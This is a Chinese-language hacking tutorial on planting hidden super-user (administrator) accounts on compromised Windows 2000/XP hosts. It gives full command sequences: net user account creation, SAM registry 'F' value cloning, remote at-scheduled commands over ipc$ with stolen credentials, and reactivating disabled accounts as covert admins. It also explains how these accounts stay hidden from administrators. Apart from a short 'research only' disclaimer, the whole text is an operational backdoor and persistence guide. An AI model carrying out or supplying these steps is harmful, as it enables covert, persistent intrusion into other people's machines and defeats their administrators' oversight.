創建隱藏的超級用戶 |
1、如何在圖形界面創建隱藏的超級用戶 圖形界面下適用本地或開3389終端服務的肉雞上。上面我提到的那位做者說的方法很好,可是較爲複雜,還要用到psu.exe(讓程序以系統用戶身份運行的程序),若是在肉雞上的話還要上傳psu.exe。我說的這個方法將不用到psu.exe這個程序。由於windows2000有兩個註冊表編輯器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe實爲一個程序,修改鍵值的權限時在右鍵中點「權限」來修改。對regedit.exe我想你們都很熟悉,但卻不能對註冊表的項鍵設置權限,而regedt32.exe最大的優勢就是可以對註冊表的項鍵設置權限。nt/2000/xp的賬戶信息都在註冊表的HKEY_LOCAL_MACHINE\SAM\SAM鍵下,可是除了系統用戶SYSTEM外,其它用戶都無權查看到裏面的信息,所以我首先用regedt32.exe對SAM鍵爲我設置爲「徹底控制」權限。這樣就能夠對SAM鍵內的信息進行讀寫了了。具體步聚以下: 一、假設咱們是以超級用戶administrator登陸到開有終端服務的肉雞上的,首先在命令行下或賬戶管理器中創建一個賬戶:hacker$,這裏我在命令行下創建這個賬戶 net user hacker$ 1234 /add 二、在開始/運行中輸入:regedt32.exe並回車來運行regedt32.exe。 三、點「權限」之後會彈出窗口 點添加將我登陸時的賬戶添加到安全欄內,這裏我是以administrator的身份登陸的,因此我就將administrator加入,並設置權限爲「徹底控制"。這裏須要說明一下:最好是添加你登陸的賬戶或賬戶所在的組,切莫修改原有的賬戶或組,不然將會帶來一系列沒必要要的問題。等隱藏超級用戶建好以,再來這裏將你添加的賬戶刪除便可。 四、再點「開始」→「運行」並輸入"regedit.exe" 回車,啓動註冊表編輯器regedit.exe。 打開鍵:HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$" 五、將項hacker$、0000040九、000001F4導出爲hacker.reg、409.reg、1f4.reg,用記事本分別打這幾個導出的文件進行編輯,將超級用戶對應的項000001F4下的鍵"F"的值複製,並覆蓋hacker$對應的項00000409下的鍵"F"的值,而後再將00000409.reg與hacker.reg合併。 六、在命令行下執行net user hacker$ /del將用戶hacker$刪除:net user hacker$ /del 七、在regedit.exe的窗口內按F5刷新,而後打文件-導入註冊表文件將修改好的hacker.reg導入註冊表便可 八、到此,隱藏的超級用戶hacker$已經建好了,而後關閉regedit.exe。在regedt32.exe窗口內把HKEY_LOCAL_MACHINE\SAM\SAM鍵權限改回原來的樣子(只要刪除添加的賬戶administrator便可)。 九、注意:隱藏的超級用戶建好後,在賬戶管理器看不到hacker$這個用戶,在命令行用「net user」命令也看不到,可是超級用戶創建之後,就不能再改密碼了,若是用net user命令來改hacker$的密碼的話,那麼在賬戶管理器中將又會看這個隱藏的超級用戶了,並且不能刪除。 2、如何在命令行下遠程創建隱藏的超級用戶 在這裏將用at的命令,由於用at產生的計劃任務是以系統身份運行的,因此也用不到psu.exe程序。爲了可以使用at命令,肉雞必須開有schedule的服務,若是沒有開啓,可用流光裏帶的工具netsvc.exe或sc.exe來遠程啓動,固然其方法也能夠,只要能啓動schedule服務就行。 對於命令行方式,你能夠採用各類鏈接方式,如用SQLexec鏈接MSSQL的1433端口,也能夠用telnet服務,只要以你能獲得一個cmdshell,而且有運行at命令的權限就能夠。 一、首先找到一臺肉雞,至於如何來找那不是我這裏所說的話題。這裏先假設找到一臺超級用戶爲administrator,密碼爲12345678的肉雞,如今咱們開始在命令行下遠程爲它創建隱藏的超級用戶。(例子中的主機是個人局域網內的一臺主機,我將它的ip地址改成13.50.97.238,,請勿在互聯網上對號入座,以避免騷擾正常的ip地址。) 二、先與肉雞創建鏈接,命令爲: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator 三、用at命令在肉雞上創建一個用戶(若是at服務沒有啓動,可用小榕的netsvc.exe或sc.exe來遠程啓動):at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add 創建這個加有$符的用戶名,是由於加有$符後,命令行下用net user將不顯示這個用戶,但在賬戶管理器卻能看到這個用戶。 四、一樣用at命令導出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下鍵值:at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\ /e 是regedit.exe的參數,在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\這個鍵的必定要以\結尾。必要的狀況下能夠用引號將"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引發來。 五、將肉雞上的hacker.reg下載到本機上用記事本打開進行編輯命令爲:copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg 修改的方法圖形界中已經介紹過了,這裏就不做介紹了。 六、再將編輯好的hacker.reg拷回肉雞上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg 七、查看肉雞時間:net time \\13.50.97.238 而後用at命令將用戶hacker$刪除: at \\13.50.97.238 13:40 net user hacker$ /del 八、驗證hacker$是否刪除:用 net use \\13.50.97.238 /del 斷開與肉雞的鏈接。 net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用賬戶hacker$與肉雞鏈接,不能鏈接說明已刪除。 九、再與肉雞創建鏈接:net use \\13.50.97.238\ipc$ "12345678" /user:"administrator" 再取得肉雞時間,用at命令將拷回肉雞的hacker1.reg導入肉雞註冊表: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg regedit.exe的參數/s是指安靜模式。 十、再驗證hacker$是否已創建,方法同上面驗證hacker$是否被刪除同樣。 十一、再驗證用戶hacker$是否有讀、寫、刪的權限,若是不放心,你還可驗證是否能創建其它賬戶。 十二、經過11能夠判定用戶hacker$具備超級用戶權限,由於最初我用at命令創建它的時候是一個普通用戶,而如今卻具備遠程讀、寫、刪的權限。 3、若是肉雞沒有開3389終端服務,而我又不想用命令行,怎麼辦? 這種狀況下,你也能夠用界面方式來遠程爲肉雞創建隱藏的超級用戶。由於regedit.exe、regedt32.exe都有鏈接網絡註冊表的功能,你能夠用regedt32.exe來爲遠程主機的註冊表項設置權限,用regedit.exe來編輯遠程註冊表。賬戶管理器也有一項連另外一臺計算機的功能,你能夠用賬戶管理器爲遠程主機創建和刪除賬戶。具體步聚與上面介紹的類似,我就很少說了,只它的速度實在是使人難以忍受。 可是這裏有兩個前提:一、先用net use \\肉雞ip\ipc$ "密碼" /user:"超級用戶名"來與遠程主機創建鏈接之後,才能用regedit.exe regedt32.exe及賬戶管理器與遠程主機鏈接。 二、遠程主機必須開啓遠程註冊表服務(沒有開啓的話,你也能夠遠程開啓,由於你有超級用戶的密碼了)。 4、利用被禁用的賬戶創建隱藏的超級用戶: 咱們能夠用肉雞上被禁止的用戶來創建隱藏的超組用戶.方法以下: 1.想辦法查看有哪些用戶被細心的管理員禁止,通常狀況下,有些管理員出於安全考慮,一般會將guest禁用,固然了會禁用其它用戶。在圖形界面下,很是容易,只要在賬戶管理器中就能夠看到被禁用的賬戶上有一個紅叉;而在命令行下,我尚未想到好的辦法,只能在命令行下用命令:"net user 用戶名"一個一個來查看用戶是否被禁用。 2.在這裏,咱們假設用戶hacker被管理員禁用。首先,我先用小榕的超組用戶克隆程序CA.exe,將被禁用的用戶hacker 克隆成超級用戶(克隆以後,被禁用的用戶hacker就會自動被激活了): CA.EXE \\肉雞ip Administrator 超級用戶密碼 hacher hacher密碼。 3.若是你如今一個cmdshell,如利用telnet服務或SQLEXEC鏈接肉雞的msSQL的默認端口1433獲得的shell均可以,這時你只要輸入命令: net user hacker /active:no 這樣用戶hacker就被禁用了(至少表面上是這樣的),固然你也能夠將用戶hacher換成其它的被禁用的用戶。 4.這時若是你在圖形界面下看賬戶管理器中的用戶時,會發現用戶hacker被禁用了,但事實上是這樣的嗎?你用這個被禁用的用戶鏈接一下肉雞看看是否能連上?用命令:net user \\肉雞ip\ipc$ "hacker密碼" /user:"hacker" 連一連看看。我能夠告訴你們,通過我屢次試驗,次次都能成功,並且仍是超級用戶權限。 5.若是沒有cmdshell怎麼辦?你能夠我上面介紹的at命令來禁用用戶hacker;命令格式:at \\肉雞ip 時間 net user hacker /active:no 6.原理:具體的高深的原理我也說不上來,我只能從最簡單的說。你先在圖形界面下在賬戶管理器中禁用一下超級用戶administrator看看,確定會彈出一對話框,並禁止你繼續禁用超級用戶administrator,一樣,由於在克隆時,hacker在註冊表的"F"鍵被超級用戶administrator在註冊表的"F"鍵所替代,於是hacker就具備了超級用戶的權限了,可是因爲hacker在註冊表內"C"健仍是原來的"C"鍵,因此hacker仍是會被禁用,可是它的超級用戶權限卻不會被禁用,所以被禁用的用戶hacker仍是能夠鏈接肉雞,並且還具備超級用戶的權限。具體我也說不明白,你們權且這麼理解吧。 5、注意的幾點事項: 一、隱藏的超級用戶創建之後,在賬戶管理器中和命令行下均看不到這個用戶,但這個用戶卻存在。 二、隱藏的超級用戶創建之後,就不能再修改密碼了,由於一旦修改密碼,這個隱藏的超級用戶就會暴露在賬戶管理器中,並且不能刪除。 三、如在本機上試驗時,最好用系統自帶的備份工具先備份好本機的「系統狀態」主要是註冊表的備份,由於本人作試驗時,曾出現過賬戶管理器中看不到任何用戶,組中也看不到任何組的現象,但它們卻存在。幸虧我有備份,呵呵。SAM鍵是畢竟系統最敏感的部位。 四、本方法在2000/XP上測試經過,未在NT上測試。本方法僅供研究,請勿將本方法用於破壞上,利用本方法形成嚴重後果者,由使用者負責,本人概不負責。
|